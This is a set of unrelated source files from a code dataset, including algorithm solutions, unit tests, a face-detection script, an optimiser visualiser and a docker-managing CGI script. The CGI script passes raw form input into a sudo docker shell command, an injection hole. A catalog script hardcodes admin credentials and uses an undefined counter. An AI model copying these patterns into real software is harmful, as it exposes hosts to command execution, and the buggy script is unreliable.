\"../../top/zed_1/zed_top.vhd\",\n \"../../top/zed_1/zed_top.ucf\"\n]\n\nmodules = {\n \"local\" : [ \"../../modules/system\" ],\n \"svn\" : [ \"http://svn.ohwr.org/asyncart\"]\n}\n\nfetchto = \"../../ip_cores\"\n\n","sub_path":"hdl/syn/zed_1/Manifest.py","file_name":"Manifest.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446333434","text":"# /usr/bin/env python\r\n# --*-- coding:utf-8 --*--\r\n\"\"\"\r\n___title__ : 202.py\r\n__author__ : LongLee\r\n___date___ : 2017/3/18 14:58\r\n__Software : PyCharm\r\n\"\"\"\r\nclass Solution(object):\r\n def isHappy(self, n):\r\n \"\"\"\r\n :type n: int\r\n :rtype: bool\r\n \"\"\"\r\n p = []\r\n while True:\r\n l = [x for x in str(n)]\r\n n = 0\r\n for i in l:\r\n n += (int(i) ** 2)\r\n p.append(n)\r\n if n == 1:\r\n return True\r\n elif p.count(n) >= 2:\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n s = Solution()\r\n print(s.isHappy(10))\r\n\r\n","sub_path":"202.py","file_name":"202.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"317942399","text":"#!/usr/bin/python36\n\n\nimport subprocess as sp\nimport cgi\nimport 
os\nprint(\"content-type:text/html\")\nprint(\"\\n\")\nprint('''
python2

\n\t
username python
password python

''')\nprint('
python36

username python36
password python36
')\nprint(\"
\")\n\n\nform=cgi.FieldStorage()\ncname=form.getvalue(\"cname\")\nimgname=form.getvalue(\"imgname\")\nsp.getoutput(\"sudo docker run -dit --name {c} -p 3000:4200 {i}\".format(c=cname,i=imgname))\n#print(\"hi\")\nlist_images=sp.getoutput(\"sudo docker ps --format 'table {{.Image}}'\")\nlist_names=sp.getoutput(\"sudo docker ps --format 'table {{.Names}}'\")\nlist_status=sp.getoutput(\"sudo docker ps --format 'table {{.Status}}'\")\nlist1_images=list_images.split('\\n')\nlist1_names=list_names.split('\\n')\nlist1_status=list_status.split('\\n')\n\n#list= str(sp.getoutput(\"sudo docker ps -a --format 'table'\"))\n#flist=list.split(\"\\n\")\n\nprint(\"



\")\nprint('''\n\n\n\n\n\n''')\n#print(\"
IMAGE NAMECONTAINER NAMESTATUSSTART/STOPCONSOLE
\")\nfor i,j,k in zip(list1_images[1:],list1_names[1:],list1_status[1:]):\n\t#j=i.split()\n\tprint(\"\")\n\tprint(\"\")\n\tif 'Exited' in k:\n\t\tstr=\"\"\n\t\tprint(str)\n\telif 'Up' in k:\n\t\tstr=\"\"\n\t\tprint(str)\n\telse:\n\t\tstr=\"\"\n\t\tprint(str)\n\tif 'Up' in str:\n\t\tprint(\"\".format(j))\n\telif 'Down' in str:\n\t\tprint(\"\".format(j))\n\telse:\n\t\tprint(\"\")\n \n\tif 'Up' in str:\n\t\tsp.getoutput(\"systemctl restart shellinaboxd\")\n\t\tprint(\"\")\n\t\t\n\telse:\n\t\tprint(\"\")\nprint(\"
\")\n\tprint(i)\n\tprint(\"\"+j+\"DownUpUnknown stop startNothingGet
Get
\")\n","sub_path":"pass-list-manage.py","file_name":"pass-list-manage.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"200779114","text":"import numpy as np\nimport copy\n\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import animation\nfrom matplotlib import cm\n\ndef frange(start, stop, step):\n i = start\n while i < stop:\n yield i\n i += step\n\nclass Optimiser:\n def __init__(self, anObjectiveFunction, initial_guess = None):\n self.objective_function = anObjectiveFunction;\n self.best_solution = None;\n self.current_solution_set = [];\n self.visualisation_callback = None;\n self.verbose = False;\n self.initial_guess = initial_guess;\n self.full_name = \"Unknown optimiser\";\n self.short_name = \"Unknown optimiser\";\n\n def runIteration(self):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n def evaluate(self, aParameterSet):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n def createFigure(self):\n # Create the figure and axes\n fig = plt.figure();\n ax = fig.add_subplot(111, projection='3d');\n\n # Create the wireframe\n X = [];\n Y = [];\n Z = [];\n\n offset_x = (self.objective_function.boundary_set[1][1] - self.objective_function.boundary_set[1][0]) / 26\n\n offset_y = (self.objective_function.boundary_set[0][1] - self.objective_function.boundary_set[0][0]) / 26\n\n for y in frange(self.objective_function.boundary_set[0][0], self.objective_function.boundary_set[0][1] + offset_y, offset_y):\n #\n Temp_X = [];\n Temp_Y = [];\n Temp_Z = [];\n #\n for x in frange(self.objective_function.boundary_set[1][0], self.objective_function.boundary_set[1][1] + offset_x, offset_x):\n genes = [x, y];\n objective_value = self.evaluate(genes);\n Temp_X.append(x);\n Temp_Y.append(y);\n Temp_Z.append(objective_value);\n #\n X.append(Temp_X);\n Y.append(Temp_Y);\n Z.append(Temp_Z);\n\n self.objective_function.number_of_evaluation = 0;\n\n # Plot a basic wireframe.\n #surf = ax.plot_wireframe(np.array(X), np.array(Y), np.array(Z))\n surf = ax.plot_surface(np.array(X), np.array(Y), np.array(Z), cmap=cm.jet, alpha=0.2)\n\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n\n # Plot the current best\n scat1 = ax.scatter([], [], [], marker='o', c='r', s=50)\n\n # Plot the current population\n scat2 = ax.scatter([], [], [], marker='o', c='g', s=30)\n\n return fig, scat1, scat2;\n\n # Print the current state in the console\n def printCurrentStates(self, anIteration):\n print(\"Iteration:\\t\", anIteration);\n print(self);\n print();\n\n def update(self, i):\n # Print the current state in the console\n if self.verbose:\n self.printCurrentStates(i);\n\n # This is not the initial population\n if i != 0:\n # Run the optimisation loop\n self.runIteration();\n\n # Print the current state in the console\n if self.verbose:\n self.printCurrentStates(i);\n\n if self.visualisation_callback != None:\n self.visualisation_callback();\n\n # Best solution in red\n if self.best_solution != None:\n xdata1, ydata1, zdata1 = [], [], [];\n xdata1.append(self.best_solution.getParameter(0));\n ydata1.append(self.best_solution.getParameter(1));\n zdata1.append(self.best_solution.getObjective());\n self.scat1._offsets3d = (xdata1, ydata1, zdata1)\n\n # All the current solution\n xdata2, ydata2, zdata2 = [], [], [];\n for individual in 
self.current_solution_set:\n xdata2.append(individual.getParameter(0));\n ydata2.append(individual.getParameter(1));\n zdata2.append(individual.getObjective());\n self.scat2._offsets3d = (xdata2, ydata2, zdata2)\n\n def getBestSolution(self):\n param = copy.deepcopy(self.best_solution.parameter_set);\n objective = self.best_solution.getObjective();\n\n if self.objective_function.flag != self.best_solution.flag:\n objective *= -1;\n \n return param, objective;\n\n def plotAnimation(self, aNumberOfIterations, aCallback = None, aFileName = \"\"):\n\n self.visualisation_callback = aCallback;\n\n if len(self.objective_function.boundary_set) == 2:\n # Create a figure (Matplotlib)\n fig, self.scat1, self.scat2 = self.createFigure();\n\n if self.objective_function.name != \"\":\n title = self.objective_function.name + \"\\n\" + self.full_name;\n else:\n title = self.full_name;\n\n plt.title(title);\n\n # Run the visualisation\n numframes = aNumberOfIterations + 1;\n ani = animation.FuncAnimation(fig, self.update, frames=range(numframes), repeat=False);\n\n # Set up formatting for the movie files\n if aFileName != \"\":\n Writer = animation.writers['imagemagick']\n writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n ani.save(aFileName, writer=writer)\n else:\n plt.show();\n else:\n raise NotImplementedError(\"Visualisation for \" + str(len(self.objective_function.boundary_set)) + \"-D problems is not implemented\")\n\n def __repr__(self):\n value = \"\"\n\n for ind in self.current_solution_set:\n value += ind.__repr__();\n value += '\\n';\n\n return value;\n","sub_path":"src/Optimiser.py","file_name":"Optimiser.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389811317","text":"import itertools\nimport sys\nsys.stdin = open('최대 상금_input.txt')\nT = int(input())\nfor tc in range(T):\n P, N = map(str, input().split())\n N = int(N)\n arr = [i for i in range(len(P))]\n p = list(itertools.permutations(arr, 2))\n M = [[] for _ in range(N+1)]\n M[0].append(P)\n for i in range(N):\n for j in range(len(M[i])):\n x = list(M[i][j])\n for k in p:\n x[k[0]], x[k[1]] = x[k[1]], x[k[0]]\n if ''.join(x) not in M[i+1]:\n M[i+1].append(''.join(x))\n x[k[0]], x[k[1]] = x[k[1]], x[k[0]]\n\n ans = 0\n for i in M[N]:\n if ans < int(i):\n ans = int(i)\n print('#{} {}'.format(tc+1, ans))","sub_path":"25/최대 상금2.py","file_name":"최대 상금2.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"419070228","text":"import cv2 \r\ncasc_path = \"C:\\\\ProgramData\\\\Anaconda3\\\\pkgs\\\\opencv3-3.1.0-py27_0\\\\Library\\etc\\\\haarcascades\\\\haarcascade_frontalface_default.xml\"\r\nfaceCascade = cv2.CascadeClassifier(casc_path)\r\nimage = cv2.imread(\"media\\\\person8.jpg\")\r\nfaces = faceCascade.detectMultiScale(image, scaleFactor=1.1, minNeighbors=5, minSize=(30,30), flags = cv2.CASCADE_SCALE_IMAGE)\r\n#image.shape[0]:获取图片高度,image.shape[1]:获取图片宽度\r\ncv2.rectangle(image, (10,image.shape[0]-20), (110,image.shape[0]), (0,0,0), -1)\r\ncv2.putText(image,\"Find \" + str(len(faces)) + \" face!\", (10,image.shape[0]-5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 2)\r\nfor (x,y,w,h) in faces:\r\n cv2.rectangle(image,(x,y),(x+w, y+h),(128,255,0),2)\r\ncv2.namedWindow(\"facedetect\")\r\ncv2.imshow(\"facedetect\", image)\r\ncv2.waitKey(0) 
\r\ncv2.destroyWindow(\"facedetect\")\r\n","sub_path":"python_sample_code/ch10/detectFace8.py","file_name":"detectFace8.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"311837235","text":"import earth_system.altimetry.filtering as filtering\nfrom unittest import mock\nimport pytest\nimport pandas\n\nraw_df = {\n 'iflags': [129, 8, 66, 129],\n 'oflags': [0, 24, 0, 64],\n }\nraw_df['niflags'] = [128, 8, 66, 129]\ndataframe = pandas.DataFrame(raw_df)\n\n\ndef compare_with_list(series, list_):\n comparison = [_1 == _2 for _1, _2 in zip(series, list_)]\n return comparison\n\n\ndef test_flags_set():\n flags = [\n filtering.IFlags.rain_or_ice,\n filtering.IFlags.agc_signal_to_noise_ratio,\n filtering.OFlags.maneuver,\n ]\n\n # check normal\n result = filtering.flags_set(dataframe, flags, invert=False)\n assert compare_with_list(result, [True, False, True, True])\n # check inversion\n result = filtering.flags_set(dataframe, flags, invert=True)\n assert compare_with_list(result, [False, True, False, False])\n # check columns\n result = filtering.flags_set(\n dataframe,\n flags,\n invert=False,\n columns=(\"niflags\", \"oflags\"),\n )\n assert compare_with_list(result, [False, False, True, True])\n\n\ndef test_flags_set_simple():\n flag = filtering.IFlags.rain_or_ice\n\n result = filtering.flags_set(dataframe, flag, invert=False)\n assert compare_with_list(result, [False, False, True, False])\n\n\n@mock.patch.object(filtering, 'flags_set')\ndef test_select_flags(flags_set):\n dataframe = pandas.DataFrame({'a': [0, 1, 2, 3], 'b': [2, 4, 6, 8]})\n flags = []\n\n flags_set.return_value = [True, False, False, False]\n result = filtering.select_flags(dataframe, flags, invert=False)\n # check that the result is what was expected\n assert (result.get_values().flatten() == [0, 2]).all()\n\n\ndef test_select_sigma():\n dataframe = pandas.DataFrame({\n 'values': [0, 1, 2, 3],\n 'stdalt': [1, 4, 0.5, -2],\n })\n\n result = filtering.select_sigma(\n dataframe,\n greater_than=1,\n )\n\n columns = [\"values\", \"stdalt\"]\n\n comparison = result[columns].get_values().flatten() == [1, 4, 3, -2]\n assert comparison.all()\n\n\ndef test_select_sigma_range():\n dataframe = pandas.DataFrame({\n 'values': [0, 1, 6, 3, 4, 10, 15, 20],\n 'stdalt': [1, 4, 0.5, -2, 5, 0.1, -3, -0.62],\n })\n\n result = filtering.select_sigma(\n dataframe,\n less_than=15,\n greater_than=3,\n column=\"values\",\n )\n\n columns = [\"values\", \"stdalt\"]\n assert (\n result[columns].get_values().flatten() == [6, 0.5, 4, 5, 10, 0.1]\n ).all()\n\n\ndef test_select_sigma_invalid_usage():\n dataframe = []\n exception_message = \"one of greater_than or less_than has to be set\"\n with pytest.raises(TypeError) as error:\n filtering.select_sigma(dataframe)\n assert str(error.value) == exception_message\n\n\n@mock.patch('earth_system.altimetry.filtering.select_sigma')\n@mock.patch('earth_system.altimetry.filtering.select_flags')\ndef test_select(select_flags, select_sigma):\n dataframe = [\n \"filter by flags 1\",\n \"filter by sigma 1\",\n \"valid 1\",\n \"filter by sigma 2\",\n \"filter by sigma 3\",\n \"valid 2\",\n \"valid 3\",\n \"filter by flags 2\",\n ]\n n_dataframes = 4\n dataframes = [dataframe] * n_dataframes\n\n flags = list(range(5))\n\n after_sigma_filter = [\n df\n for df in dataframe\n if \"sigma\" not in df\n ]\n after_flags_filter = [\n df\n for df in after_sigma_filter\n if \"flags\" not in df\n ]\n\n select_sigma.return_value = 
after_sigma_filter\n select_flags.return_value = after_flags_filter\n expected_dataframes = [\n [df for df in dataframe if \"filter\" not in df]\n ] * n_dataframes\n\n sigma = 2\n filtered_dataframes = list(filtering.select(\n dataframes,\n flags=flags,\n less_than=sigma,\n ))\n assert filtered_dataframes == expected_dataframes\n assert select_sigma.call_args_list == [\n mock.call(\n dataframe,\n column=\"stdalt\",\n less_than=sigma,\n greater_than=None,\n )\n\t\t] * n_dataframes\n assert select_flags.call_args_list == [\n mock.call(\n after_sigma_filter,\n columns=[\"iflags\", \"oflags\"],\n flags=flags,\n invert=False,\n )\n ] * n_dataframes\n\n\ndef test_select_range():\n dataframe = pandas.DataFrame({\n 'value1': list(range(10, 20)),\n 'value2': list(range(85, 95)),\n })\n\n range_mapping = {\n 'value1': (11, 15),\n 'value2': (88, 93),\n }\n\n expected_dataframe = pandas.DataFrame({\n 'value1': list(range(13, 16)),\n 'value2': list(range(88, 91)),\n }, index=list(range(3, 6)))\n\n result = filtering.select_range(dataframe, range_mapping)\n assert (result == expected_dataframe).all().all()\n","sub_path":"tests/altimetry/test_filtering.py","file_name":"test_filtering.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"449742462","text":"import unittest\n\nfrom RULEngine.Game.Player import Player\nfrom RULEngine.Game.Team import Team\nfrom RULEngine.Util.constant import PLAYER_PER_TEAM, MAX_PLAYER_ON_FIELD_PER_TEAM\nfrom RULEngine.Util.Position import Position\nfrom RULEngine.Util.Pose import Pose\nfrom RULEngine.Util.team_color_service import TeamColor\n\n\nclass TestTeam(unittest.TestCase):\n\n def setUp(self):\n self.team = Team(TeamColor.YELLOW)\n self.team_blue = Team(TeamColor.BLUE)\n self.first_player = self.team.players[0]\n self.second_player = self.team.players[1]\n self.no_player = Player(self.team, 0)\n\n def test_init(self):\n self.assertEqual(PLAYER_PER_TEAM, len(self.team.players))\n self.assertEqual(0, len(self.team.available_players))\n self.assertEqual(0, self.team.score)\n self.assertFalse(self.team.exiting_players)\n self.assertFalse(self.team.entering_players)\n self.assertEqual(TeamColor.YELLOW, self.team.team_color)\n\n def test_has_player_exists(self):\n self.assertTrue(self.team.has_player(self.first_player))\n\n def test_has_player_no_exists(self):\n self.assertFalse(self.team.has_player(self.no_player))\n\n def test_update_player(self):\n init_pose = self.first_player.pose\n self.assertEqual(init_pose, self.team.players[0].pose)\n self.team.update_player(0, [Pose(Position(500, 500))])\n self.assertNotEqual(init_pose, self.team.players[0].pose)\n self.assertEqual(self.team.players[0].pose, self.first_player.pose)\n\n def test_update_availability_players(self):\n for i in range(MAX_PLAYER_ON_FIELD_PER_TEAM):\n self.team.update_player(i, [Pose(Position(500, 500))])\n self.assertTrue(self.team.players[i] in self.team.available_players.values())\n self.team.update_player(MAX_PLAYER_ON_FIELD_PER_TEAM+1, [Pose(Position(500, 500))])\n self.assertTrue(self.team.players[MAX_PLAYER_ON_FIELD_PER_TEAM+1] in self.team.available_players.values())\n self.assertTrue(len(self.team.available_players) == MAX_PLAYER_ON_FIELD_PER_TEAM+1)\n # simulating 21 frames where we don't see the robot\n for i in range(21):\n self.team.update_player(0, [None])\n self.assertTrue(self.team.players[0] not in self.team.available_players.values())\n\n def test_invalid_id(self):\n AN_INVALID_ID = 
PLAYER_PER_TEAM+1\n uut = self.team.update_player\n self.assertRaises(KeyError, uut, AN_INVALID_ID, Pose())\n\n def test_is_team_yellow(self):\n self.assertTrue(self.team.is_team_yellow())\n self.assertFalse(self.team_blue.is_team_yellow())\n","sub_path":"tests/RULEngine/Game/test_team.py","file_name":"test_team.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"67974929","text":"from openpyxl import load_workbook, Workbook\nfrom Bio import SeqIO\n\nclass TargetCreator():\n def __init__(self, user_input):\n wb = load_workbook(user_input['excel_file_location'])\n self.ws = wb.active\n self.max_col = self.ws.max_column\n self.max_row = self.ws.max_row\n self.targets = []\n self.fasta_location = user_input['fasta_location']\n self.excel_reader()\n\n def excel_reader(self):\n for row in range(2, self.max_row + 1):\n target = {\n \"target\": self.ws.cell(row, 1).value,\n \"partner\": \"Xyphos\",\n \"protein_class_pk\": \"1\",\n \"notes\": self.ws.cell(row, 2).value,\n \"project_name\": \"Xolo\",\n \"subunits\": self.parse_subunits(row),\n }\n self.targets.append(target)\n \n def parse_subunits(self, row):\n subunit_array = []\n for i in range(3, self.max_col + 1, 2):\n subunit_name = self.ws.cell(row, i).value \n subunit = {\n \"subunit_name\": subunit_name,\n \"copies\": \"1\",\n \"amino_acid_fasta_description\": subunit_name,\n \"amino_acid_sequence\": self.get_fasta_sequence(subunit_name, \"AA\"),\n \"genes\": self.parse_genes(subunit_name)\n }\n subunit_array.append(subunit)\n return subunit_array\n\n def parse_genes(self, subunit_name):\n gene = {}\n gene[\"dna_fasta_description\"] = subunit_name\n gene[\"dna_sequence\"] = self.get_fasta_sequence(subunit_name, \"DNA\")\n return [(gene)]\n\n def get_fasta_sequence(self, file_name, seq_type):\n errors = []\n sequence = ''\n try:\n for record in SeqIO.parse(f'{self.fasta_location}/{file_name}_{seq_type}.fasta', 'fasta'):\n sequence = str(record.seq) \n except FileNotFoundError as err:\n errors.append(f'{err}: {err.filename2}')\n if len(sequence) > 0:\n return sequence\n if (errors):\n return errors\n","sub_path":"lib/target_creator.py","file_name":"target_creator.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"613214249","text":"\n# Necessary import to be able to use Django's model library.\nfrom django.db import models\n\n# Another import, this one to allow us to sync our own UserInfo database\n# with a given user from Django's User database.\nfrom django.contrib.auth.models import User\n\n\"\"\" USER\n The user model holds all of the information pertaining to a given user,\n aside from the username and password; these are held by Django's own\n User model. Instead, this model holds all the extra information associated\n with a user, including the following:\n 1) A boolean value representing whether the user has finished the\n experiment.\n 2) Their answers to the 26 questions. Admittedly, this implementation\n is pretty clunky. Ideally we would have an easy way of storing 26 (or\n X many) decimals, but Django (and really databases in general) don't\n support lists very well. This is the approach I've taken, if you,\n future developer, see a better way to do it, by all means...\n 3) The ordering of the domains. This will just be stored as a string.\n 4) The ordering of the questions. 
This will also be stored as a string.\n 5) The number of questions the user has answered thus far.\n 6) The payment that the user will receive. This will only be computed\n after the user has finished the experiment.\n\"\"\"\nclass UserProfile(models.Model):\n\n # The User object that this profile corresponds to.\n user = models.OneToOneField(User)\n\n\n # Every user is going to be facing either the static or dynamic arm.\n # We control which with the user_class variable. user_class will be\n # set to either \"static\" or \"dynamic\" to indicate which class the\n # user belongs to.\n user_class = models.CharField(max_length = 7)\n\n\n # Keep track of which trial we're on. If the user is dynamic, we also need\n # to know which day they are on.\n trials_done = models.IntegerField(default = 0)\n day = models.CharField(max_length = 9, default = \"Monday\")\n\n\n # A bunch of Booleans to represent where the user is located in the\n # experiment.\n finished_training = models.BooleanField(default = False)\n finished_experiment = models.BooleanField(default = False)\n finished_diagnostics = models.BooleanField(default = False)\n\n\n # Finally, the payment.\n payment = models.DecimalField(max_digits = 6, decimal_places = 2, default = \"0.00\")\n payment_trial = models.IntegerField()\n\n\n # Return URL. This is only relevant to TESS subjects, as it holds the\n # URL that the user should return to once they have completed the survey.\n return_url = models.CharField(max_length = 150, default = \"\")\n\n\n\n\"\"\" TRIAL ANSWER\n This model will store each user's answers to each trial. Every answer\n to every trial from the experimental half of the project from every\n user that participates will be stored here. Each entry into the model has\n four components: the User that the entry belongs to, the number of the\n question that they are answering, their answer to that question, and the\n percent they were off by.\n\n FIELDS\n user The User object corresponding to who this answer belongs to. This\n is to identify who created this answer.\n question The user's question-index. If this question was the user's\n nth question, this field will be set to n.\n\n And then a crap ton of variables to hold the info about the trial at hand\n and the user's responses to it.\n \n\"\"\"\nclass TrialAnswer(models.Model):\n user = models.ForeignKey(User)\n question = models.IntegerField()\n\n # Info about the question\n incomes = models.CommaSeparatedIntegerField(max_length = 30)\n interests = models.CommaSeparatedIntegerField(max_length = 30)\n responses = models.CommaSeparatedIntegerField(max_length = 30)\n\n\n \"\"\" Whenever the user submits a response we need to add it to the\n trial object. The way in which this is done differs for dynamic\n and static users. If the user is static, we just set self.responses\n equal to response; if the user is dynamic, however, we need to add\n to self.responses rather than reset it.\n \"\"\"\n def add_response(self, user, response):\n\n # When we get the responses, they're in a list form.\n response = ','.join(response)\n \n if user.get_profile().user_class == \"static\":\n self.responses = response\n else:\n if self.responses:\n self.responses += \",\" + response\n else:\n self.responses = response\n self.save()\n\n\n \"\"\" We need to check that the user's responses are legal. That is, are their\n responses OK for the given trial, given that trial's incomes and interests?\n If they are, then we just return the responses exactly as given, adding. 
If they're\n not, we change the later responses so that they are legal.\n \"\"\"\n def validate(self):\n\n # Couple of initial variables. carry_over represents how much money\n # we have carried from the previous day.\n carry_over = 0.\n index = 0\n\n # Convert all the incomes, interests and responses from Django's unicode\n # to floats. It will be helpful to divide everything in interests by 100\n # to change the values from percents to decimal figures.\n incomes = map(float, self.incomes.split(','))\n interests = map(lambda x: float(x) / 100., self.interests.split(','))\n responses = map(float, self.responses.split(','))\n \n for response in responses:\n\n # The first thing we do for every day of the week is find out\n # how much money we could possibly have to spend. This is calculated\n # as the amount of money carried over from the previous day, plus\n # today's income, plus money that we could borrow.\n today_money = carry_over + incomes[index]\n borrowable = float(incomes[-1])\n for day in reversed(range(index, len(interests))):\n borrowable = borrowable / (1 + interests[day]) + (incomes[day] if day != index else 0)\n\n # The amount of cash we can spend today is how much we have physically\n # plus how much we can borrow\n spendable = today_money + borrowable\n\n # If the amount we want to spend is less than what we can spend, then\n # allow it. Otherwise, the amount we get to spend is restricted to\n # to what we can spend.\n if response > spendable:\n responses[index] = round(spendable, 2)\n carry_over = (today_money - responses[index]) * (1 + interests[index])\n index += 1\n\n # Lastly, give the user whatever's left over to spend on the last day.\n # Convert into CommaSeparatedInteger form\n responses.append(round(carry_over + incomes[-1], 2))\n responses = ','.join(map(str, responses))\n\n # Save that shit.\n self.responses = responses\n self.save()\n\n\n\n\"\"\" The responses that a dynamic user has for the diagnostic questions.\n\"\"\"\nclass DiagnosticAnswer(models.Model):\n\n # The user.\n user = models.OneToOneField(User)\n\n # The questions\n question_1 = models.DecimalField(max_digits = 5, decimal_places = 2)\n question_2 = models.DecimalField(max_digits = 5, decimal_places = 2)\n question_3 = models.DecimalField(max_digits = 5, decimal_places = 2)\n question_4 = models.DecimalField(max_digits = 5, decimal_places = 2)\n\n\n\n","sub_path":"experiment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"559316159","text":"\n\nfrom xai.brain.wordbase.nouns._prong import _PRONG\n\n#calss header\nclass _PRONGS(_PRONG, ):\n\tdef __init__(self,): \n\t\t_PRONG.__init__(self)\n\t\tself.name = \"PRONGS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"prong\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_prongs.py","file_name":"_prongs.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"534182658","text":"'''\nCreated on Jul 16, 2018\n\n@author: dwrigley\n\nget a list of all custom attributes in EDC - returning the Name and Id\nthe id would be used for any search/custom import activiies\noutput printed to the console\n'''\n\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport time\n\nstart_time = time.time()\n\n# ******************************************************\n# change these settings for your catalog service\n# 
******************************************************\n# set variables for connecting to the catalog\n# and running a query to get a result-set\n# the processItem function will be called for each item\n# ******************************************************\ncatalogServer = 'http://napslxapp01:9085'\nuid = 'Administrator'\npwd = 'Administrator'\n# pwd=uid;\npageSize = 500 # number of objects for each page/chunk\n# ******************************************************\n# end of parameters that should be changed\n# ******************************************************\nresturl = catalogServer + '/access/2/catalog/models/attributes'\nheader = {\"Accept\": \"application/json\"} \n\n\n# main function\ndef main():\n \"\"\"\n call GET /access/2/catalog/models/attributes\n and GET /access/2/catalog/models/referenceAttributes\n the /access/2/catalog/models/attributes call returns all attributes\n (system + custom), so we filter for only the custom attrs\n these start with \"com.infa.appmodels.ldm.\"\n\n output - prints the attribute name, id and some other properties to console\n \"\"\"\n global resturl\n\n total = 1000 # initial value - set to > 0 - replaced after first call\n offset = 0\n page = 0\n \n print(\"url=\" + resturl)\n print(\"user=\" + uid)\n print(\"\")\n print(header)\n \n attrCount = 0\n custAttrCount = 0\n \n while offset < total:\n page += 1\n parameters = {'offset': offset, 'pageSize': pageSize}\n\n # execute catalog rest call, for a page of results\n resp = requests.get(resturl, params=parameters, headers=header,\n auth=HTTPBasicAuth(uid, pwd))\n status = resp.status_code\n if status != 200:\n # some error - e.g. catalog not running, or bad credentials\n print(\"error! 
\" + str(status) + str(resp.json()))\n break\n \n resultJson = resp.json()\n total = resultJson['metadata']['totalCount']\n\n # for next iteration\n offset += pageSize\n \n # for each attribute found...\n for attrDef in resultJson[\"items\"]:\n classificationCount += 1\n attrId = attrDef[\"id\"]\n attrName = attrDef[\"name\"]\n dataType = attrDef[\"refDataTypeId\"]\n sortable = attrDef[\"sortable\"]\n facetable = attrDef[\"facetable\"]\n if attrId.startswith(\"com.infa.appmodels.ldm.\"):\n custAttrCount += 1\n print(\"Name: \" + attrName + \" id=\" + attrId + \" type=\" +\n dataType + \" sortable=\" + str(sortable) +\n \" facetable=\" + str(facetable)) \n\n print(\"\")\n print(\"Finished - run time = %s seconds ---\" % (time.time() - start_time))\n print(\"total attributes=\" + str(attrCount))\n print(\"custom attributes=\" + str(custAttrCount))\n print(\"classifification attributes=\" + str(classificationCount))\n \n\n# call main - if not already called or used by another script\nif __name__ == \"__main__\":\n main() \n\n","sub_path":"python/listCustomAttributes.py","file_name":"listCustomAttributes.py","file_ext":"py","file_size_in_byte":5378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"77020127","text":"from sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import exists\nfrom random import randrange\n\nfrom tabledef import engine, Categories, Foods, MyFoods\n\nfrom filldb import *\n\n\ndef showStartMenu():\n \"\"\"display the start menu\"\"\"\n print(\"\\n1: Replace a food\")\n print(\"2: Show the saved foods\")\n print(\"0: Quit\\n\")\n\n\ndef getStartMenuChoice():\n \"\"\"take the user start menu choice\"\"\"\n choice = None\n ok = False\n while(not ok):\n try:\n choice = int(input(\"Enter your choice :\"))\n except ValueError:\n print(\"The number entered is wrong...\")\n\n if (choice in (1, 2, 0)):\n ok = True\n else:\n print(\"The choice must be a number within 1, 2 or 0\")\n ok = False\n return choice\n\n\n#section show registre\ndef showSavedFoodsMenu():\n print(\"\\n1: Show the simple list (foods names)\")\n print(\"2: Show the detailled list (all foods informations)\")\n print(\"0: Back to start\")\n\n\n#section replace a food\ndef showCategoryMenuChoice():\n print(\"\\n1: Select a category\")\n print(\"2: Back to start\")\n print(\"0: Quit\\n\")\n\n\ndef getCategoryMenuChoice():\n ok = False\n choice = None\n while(not ok):\n try:\n choice = int(input(\"Do your choice :\"))\n except ValueError:\n print(\"The number entered is wrong...\")\n\n if (choice in (1, 2, 0)):\n ok = True\n else:\n print(\"The choice must be a number within 1, 2 or 0\")\n ok = False\n return choice\n\n\n#sub menu select a category\ndef showCategoriesList(engine):\n \"\"\"display the list of all categories\"\"\"\n #connect to the db\n connection = engine.connect()\n Session = sessionmaker(bind=engine)\n session = Session()\n #query the db about categories\n for category in session.query(Categories):\n print(\"{} : {}\".format(category.id, category.name))\n\n connection.close()\n\n\ndef getCategoryNumberChoice(maxCategories):\n \"\"\"take the user category choosen\"\"\"\n ok = False\n choice = None\n while (not ok):\n try:\n choice = int(input(\"Enter the category number: \"))\n except ValueError:\n print(\"The number entered is wrong\")\n\n if(choice in range(1, maxCategories)):\n ok = True\n else:\n print(\"Please, the number must be in 1 to {}\\n\".\n format(maxCategories))\n ok = False\n return choice\n\n\n#sub sub menu select a 
